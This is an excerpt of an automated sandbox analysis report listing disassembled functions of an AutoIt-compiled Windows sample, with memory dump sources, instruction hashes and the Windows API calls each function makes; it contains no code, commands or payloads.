                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 81990902-0
                                                                                                                                                • Opcode ID: 17d8b3599c75678dbc837621927e0ece39aeb8998b28e7f0ca6f01e2602b32b0
                                                                                                                                                • Instruction ID: eaffb27e65942f7342e1b3dcc0d55683ebf2dc44e56b8ab9721187d6ee9f48a8
                                                                                                                                                • Opcode Fuzzy Hash: 17d8b3599c75678dbc837621927e0ece39aeb8998b28e7f0ca6f01e2602b32b0
                                                                                                                                                • Instruction Fuzzy Hash: 57E04F32028610BFE7252B51FD09E7377A9EF04310B20882DF4A6804B1DF626CA0DB10
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00246766,?,?,00000008,?,?,0024FEFE,00000000), ref: 00246998
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                • Opcode ID: 8cf31f1b94a2b8d07c86ca1add1d6356ceccac56186a76c73fbcb05a1e2dc65b
                                                                                                                                                • Instruction ID: 08beacb2ef623bd70fdd82722c9c9645b304022442204fbb4170fa81650a91f4
                                                                                                                                                • Opcode Fuzzy Hash: 8cf31f1b94a2b8d07c86ca1add1d6356ceccac56186a76c73fbcb05a1e2dc65b
                                                                                                                                                • Instruction Fuzzy Hash: 53B18C31620609CFD719CF28C48AB647BE0FF46364F25C658E899CF2A2C375E9A5CB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                • Opcode ID: 3dd5f34b3248f46a47fbbd65347f5910078583e8689f94653514a5caafdcca3f
                                                                                                                                                • Instruction ID: 06d7625aabffd61325475633162f3145ce9230e803e39c5b8758c4d19437fdf5
                                                                                                                                                • Opcode Fuzzy Hash: 3dd5f34b3248f46a47fbbd65347f5910078583e8689f94653514a5caafdcca3f
                                                                                                                                                • Instruction Fuzzy Hash: D5127071D202299BCB25DF98D8906EEB7F5FF48310F14819AE849EB251DB709E91CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: BlockInput
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3456056419-0
                                                                                                                                                • Opcode ID: dd4235acb02c4dad0fe73589f4883a4abf938ce12e46a7d367ce397005ac5a12
                                                                                                                                                • Instruction ID: 654c9aabeada4aeefafd31a354982f1a4a929a6420f140fde3506066dacb98db
                                                                                                                                                • Opcode Fuzzy Hash: dd4235acb02c4dad0fe73589f4883a4abf938ce12e46a7d367ce397005ac5a12
                                                                                                                                                • Instruction Fuzzy Hash: 73E048352202049FC710EF59D404D9AF7EDAF98760F118416FC45C7391DB70E8518F90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 0
                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                                                • Instruction ID: 6084aecbe132c824ed6addc9d39ce936c67f67ad4439630084117d0e1ec7e9aa
                                                                                                                                                • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                                                • Instruction Fuzzy Hash: B7516CF163C7476BDF384D68445E7BE63D99B02300F180A1AE982DB282C655DE35F752
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 0&.
                                                                                                                                                • API String ID: 0-3290608233
                                                                                                                                                • Opcode ID: e2bd9f59836ef480e1152d72a794c3f13bfcb921825691dcbc51e82ef50b11d0
                                                                                                                                                • Instruction ID: a2d997bc544fc6d9022ba513d93bf0a351408078762aa80738e1889bb1874412
                                                                                                                                                • Opcode Fuzzy Hash: e2bd9f59836ef480e1152d72a794c3f13bfcb921825691dcbc51e82ef50b11d0
                                                                                                                                                • Instruction Fuzzy Hash: F721EB32661611CBDB28CF79C85367E73E9A764310F15862EE4A7C77D0DE75A908CB80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: bda1bef9456331f75c71545df57f8250ad6df8efdbdb96c881304aaddbd26f52
                                                                                                                                                • Instruction ID: 004812b7e7c369d81e5cef2317abde2242f00f92db34cc0fb460e747ae90c639
                                                                                                                                                • Opcode Fuzzy Hash: bda1bef9456331f75c71545df57f8250ad6df8efdbdb96c881304aaddbd26f52
                                                                                                                                                • Instruction Fuzzy Hash: 4D725075E00229DBDF25CF59C8907AEB7B5FF44314F1481AAD809EB290EB749A85CF90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 22f9e7defc78e6c82488fd520e517ad57900ad331f23a3ff890ef3147ed693cc
                                                                                                                                                • Instruction ID: 394557d48c2abf37fa427b91834f267587b5edf3527eabd23eb58cd8d0e118b5
                                                                                                                                                • Opcode Fuzzy Hash: 22f9e7defc78e6c82488fd520e517ad57900ad331f23a3ff890ef3147ed693cc
                                                                                                                                                • Instruction Fuzzy Hash: 69324522D39F024DDB279A34DC26336A64DAFB73C5F15C737E82AB59A5EB28D4834100
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 17ddb9ff0a2cf66dafba2a4f174e9dfcd52e6dbbcf633c554e47d961472dc0aa
                                                                                                                                                • Instruction ID: ce4fc3154595a781b4487687d60ea1e3f95350d95942109946dab49813020d12
                                                                                                                                                • Opcode Fuzzy Hash: 17ddb9ff0a2cf66dafba2a4f174e9dfcd52e6dbbcf633c554e47d961472dc0aa
                                                                                                                                                • Instruction Fuzzy Hash: B4323222D29F014DD7239638D9A1336A68DAFA77C8F14D737E81AB5DA6EF28C0D35104
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9bb18eadb11cd3972d5885ff0be33251cce0a3438de8d985364723b298362979
                                                                                                                                                • Instruction ID: c3c95aea608ec4dea549200be222215867ef0c57b022b54e653433f5ba90e59e
                                                                                                                                                • Opcode Fuzzy Hash: 9bb18eadb11cd3972d5885ff0be33251cce0a3438de8d985364723b298362979
                                                                                                                                                • Instruction Fuzzy Hash: B3321431A341569BCF28EFA8D49467D7BA1EB45304F38816BD4CACB2A1D630DEE1DB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4ad9730e8ccc2cf708d5bac7f6bc7864b289ff1f95c6ba71a4ac9b87144c217f
                                                                                                                                                • Instruction ID: b1bd376c0d9046d0bcaad5e7f324b6e3fcde691f40c879180a4d5ff02be61bcc
                                                                                                                                                • Opcode Fuzzy Hash: 4ad9730e8ccc2cf708d5bac7f6bc7864b289ff1f95c6ba71a4ac9b87144c217f
                                                                                                                                                • Instruction Fuzzy Hash: A202C4B1E20106EBDF04DF64D981AAEB7B5FF54300F118169E8169B290EB71AE74CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 25956fc5bfea20bdd036dcb75c4f1a271b1f179591a399dc50be3bb9f383f354
                                                                                                                                                • Instruction ID: dbeda51c1fbc19dfc6779c33b7991536182f4edb95d9e79c463f9dcfbd0dc27d
                                                                                                                                                • Opcode Fuzzy Hash: 25956fc5bfea20bdd036dcb75c4f1a271b1f179591a399dc50be3bb9f383f354
                                                                                                                                                • Instruction Fuzzy Hash: 7D02C5B1E00609EFDF05DF64D980BAEB7B6FF44314F508169E8169B290EB31AA15CF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                • Instruction ID: 7bc20f6363384791c3fe7021d0a7510caa14813600979fbe7c25b52ffa8a1e22
                                                                                                                                                • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                                                                • Instruction Fuzzy Hash: 438188B36290A34DEB6D4A3A853453EFFE15A923A1B1E079DD4F2CB1C1EE14C574D620
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00292B30
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00292B43
                                                                                                                                                • DestroyWindow.USER32 ref: 00292B52
                                                                                                                                                • GetDesktopWindow.USER32 ref: 00292B6D
                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00292B74
                                                                                                                                                • SetRect.USER32 ref: 00292CA3
                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00292CB1
                                                                                                                                                • CreateWindowExW.USER32 ref: 00292CF8
                                                                                                                                                • GetClientRect.USER32 ref: 00292D04
                                                                                                                                                • CreateWindowExW.USER32 ref: 00292D40
                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00292D62
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00292D75
                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00292D80
                                                                                                                                                • GlobalLock.KERNEL32 ref: 00292D89
                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00292D98
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00292DA1
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00292DA8
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00292DB3
                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00292DC5
                                                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,002AFC38,00000000), ref: 00292DDB
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00292DEB
                                                                                                                                                • CopyImage.USER32 ref: 00292E11
                                                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00292E30
                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00292E52
                                                                                                                                                • ShowWindow.USER32(00000004), ref: 0029303F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                                                • Opcode ID: 94aeda847545404bc020d4d7d801710af41ec4c9ea43d2ecc57d5b7591ae7634
                                                                                                                                                • Instruction ID: d6108907ebccb0e4b19cd132c356b75d8634b6279a0c186dbfd59285515915ee
                                                                                                                                                • Opcode Fuzzy Hash: 94aeda847545404bc020d4d7d801710af41ec4c9ea43d2ecc57d5b7591ae7634
                                                                                                                                                • Instruction Fuzzy Hash: 03028971A10205EFDB14DF64DC8DEAE7BB9EB49710F108158F915AB2A1DB70AD11CFA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 002A712F
                                                                                                                                                • GetSysColorBrush.USER32 ref: 002A7160
                                                                                                                                                • GetSysColor.USER32 ref: 002A716C
                                                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 002A7186
                                                                                                                                                • SelectObject.GDI32(?,?), ref: 002A7195
                                                                                                                                                • InflateRect.USER32 ref: 002A71C0
                                                                                                                                                • GetSysColor.USER32 ref: 002A71C8
                                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 002A71CF
                                                                                                                                                • FrameRect.USER32 ref: 002A71DE
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 002A71E5
                                                                                                                                                • InflateRect.USER32 ref: 002A7230
                                                                                                                                                • FillRect.USER32 ref: 002A7262
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 002A7284
                                                                                                                                                  • Part of subcall function 002A73E8: GetSysColor.USER32 ref: 002A7421
                                                                                                                                                  • Part of subcall function 002A73E8: SetTextColor.GDI32(?,?), ref: 002A7425
                                                                                                                                                  • Part of subcall function 002A73E8: GetSysColorBrush.USER32 ref: 002A743B
                                                                                                                                                  • Part of subcall function 002A73E8: GetSysColor.USER32 ref: 002A7446
                                                                                                                                                  • Part of subcall function 002A73E8: GetSysColor.USER32 ref: 002A7463
                                                                                                                                                  • Part of subcall function 002A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002A7471
                                                                                                                                                  • Part of subcall function 002A73E8: SelectObject.GDI32(?,00000000), ref: 002A7482
                                                                                                                                                  • Part of subcall function 002A73E8: SetBkColor.GDI32(?,00000000), ref: 002A748B
                                                                                                                                                  • Part of subcall function 002A73E8: SelectObject.GDI32(?,?), ref: 002A7498
                                                                                                                                                  • Part of subcall function 002A73E8: InflateRect.USER32 ref: 002A74B7
                                                                                                                                                  • Part of subcall function 002A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002A74CE
                                                                                                                                                  • Part of subcall function 002A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 002A74DB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4124339563-0
                                                                                                                                                • Opcode ID: e1920d8ce4d10716b25e55d1f0609518364bf22f06aaa882ccb4f232cc2adcab
                                                                                                                                                • Instruction ID: fdd217266808b271caa47bff8f9fbc6d5ee379c6e4f86846829d51ce20e8517f
                                                                                                                                                • Opcode Fuzzy Hash: e1920d8ce4d10716b25e55d1f0609518364bf22f06aaa882ccb4f232cc2adcab
                                                                                                                                                • Instruction Fuzzy Hash: 24A1A372518301AFDB009F60EC4CA5BBBE9FF4A320F200A19F966A61E1DB71E954CF51
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • DestroyWindow.USER32 ref: 00228E14
                                                                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00266AC5
                                                                                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00266AFE
                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00266F43
                                                                                                                                                  • Part of subcall function 00228F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00228FC5
                                                                                                                                                • SendMessageW.USER32(?,00001053), ref: 00266F7F
                                                                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00266F96
                                                                                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00266FAC
